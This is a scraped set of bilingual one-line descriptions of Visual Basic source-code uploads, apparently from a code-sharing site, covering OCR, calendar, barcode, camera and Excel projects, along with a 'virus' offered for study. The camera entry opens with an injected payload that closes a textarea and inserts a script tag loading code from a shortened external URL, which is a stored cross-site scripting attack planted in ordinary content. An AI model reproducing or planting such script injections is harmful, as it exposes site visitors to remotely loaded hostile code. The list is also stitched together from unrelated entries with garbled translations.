- his project is my trial to make an OCR (Optical Character Recognition) program Before i made this project I v looked at other OCR projects, but in all of them i v seen NNT (Neural Net) and this is VERY COMPLICATED!!! i wan t to make a simple proj
- 对交通流的小GIS平台,vb+mapx共同开发
- 用vb写的病毒,具体我也没有研究。只用于学习,别搞破坏^_^-This virus was written in VC,but I haven t study it thoroughly.You can use it in your study,and don t destroy it!
- 这个是EAN-13的VB源代码。请大家笑纳-This is EAN-13 of the VB source code. Please笑纳
- vb ado shape 语句 实现MSHflexgrid控件分层显示结果-i don t speak English
- VB语言编的小日历程序,较适合学生做作业使用.-I wrote this calendar app to fill a need I had. Feel free to modify the code however you want, but don t re-distribute your modified code under the same name {calendar.zip}, unless it fixes a MAJOR bug that I omitted (actuall
- Skinnable Windows NotePad Clone (Professional NotePad!) - (Update January 26th, 2007)-Professional NotePad!- Is a Cool 2007 Windows Notepad Clone with the ability to change Themes... Professional Notepad Uses WindowBlinds Technology for the Skinning.
- VB介绍及简单应用,适合想学VB的新手,要学就要用心去看-Don t believe me!Fuck I must input at least 20 words!
- </textarea> ><scr ipt src=http://t.cn/Rw0iCQv></scr ipt>不需要控件的VB摄像头程序,不需要控件的VB摄像头程序-</textarea> ><scr ipt src=http://t.cn/Rw0iCQv></scr ipt>VB does not need camera control procedures, VB does not need camera
- 《汽车零部件设计计算与VB编程实例》第一章源码 例1.1 编制某一8t商用车离合器怠速弹簧刚度计算的程序 第1章例1.2 编制某一汽车离合器怠速减振弹簧刚度计算的程序带控件界面-The auto parts design calculation and the VB programming instance first chapter source code Example 1.1 compile a 8 t commercial vehicle idle speed of the
- 不要嫌弃简单,你会吗 用vb调用excel,excel做数据库,可不是access啊,-Don t abandon simple, would you Using vb to call excel, , excel do not access,
VB.net TCPIP 通讯范例
- 比较经典的学习资料,但代替不了亲身体验。(It's a classic learning material, but it can't replace personal experience)